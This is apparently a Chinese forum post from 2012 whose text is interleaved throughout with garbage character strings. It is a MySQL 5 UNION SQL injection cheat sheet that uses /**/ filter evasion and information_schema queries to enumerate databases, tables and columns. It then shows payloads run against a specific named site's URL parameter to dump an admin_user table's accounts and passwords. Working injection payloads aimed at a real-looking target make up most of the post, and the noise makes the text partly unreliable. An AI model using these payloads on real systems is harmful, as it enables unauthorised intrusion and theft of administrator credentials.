查库' X4 n- q/ U6 G" ]/ p$ k/ w( S
4 ^% \5 @& t+ E, v& f- q# v( f
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
$ W* \$ I+ S+ y/ w& e! [) m+ _# o$ \" Q0 B* p+ W
查表7 z/ H7 @0 Q, m; J4 J
, v) s3 `, `, h# ] L+ Hid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,17 U& [) A% ]- h9 \
+ L7 k9 \! F; [查段' ?) A c8 I. y2 b ~
/ J9 @/ z; ^& g4 Xid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,15 X% `" Z. |1 w* p
9 Y1 X% \$ _6 c
`$ q4 Z0 n3 C* t7 A3 b
mysql5高级注入方法暴表$ O) U$ [$ a/ x& T, q
! r% k# d. ]; W' [# G例子如下: q) B0 N' Z. [; m' e. q. Y
' N4 {) Y. ~ n% T
1.爆表
# r# w. q3 x! O! Whttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
# \ Y G2 b/ y. V这样爆到第4个时出现了admin_user表。
6 ?# Y6 }4 E7 J$ x
8 t z8 ~2 m8 R! F2.暴字段
) m9 M! p: S; ~! d8 hhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*; C: I% A# b) B) R
' U2 R! }+ [/ k' i
9 Y) N2 X% x+ O* r2 L3.爆密码) K& I- n8 K- U9 I% z- f
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* 1 ]" G8 K, d' J$ }" g2 C+ H7 f
+ Q% c' {5 L* D5 y+ O" Z2 K: t6 {, e
|
发表于 2012-9-13 16:29:37
收藏
支持
反对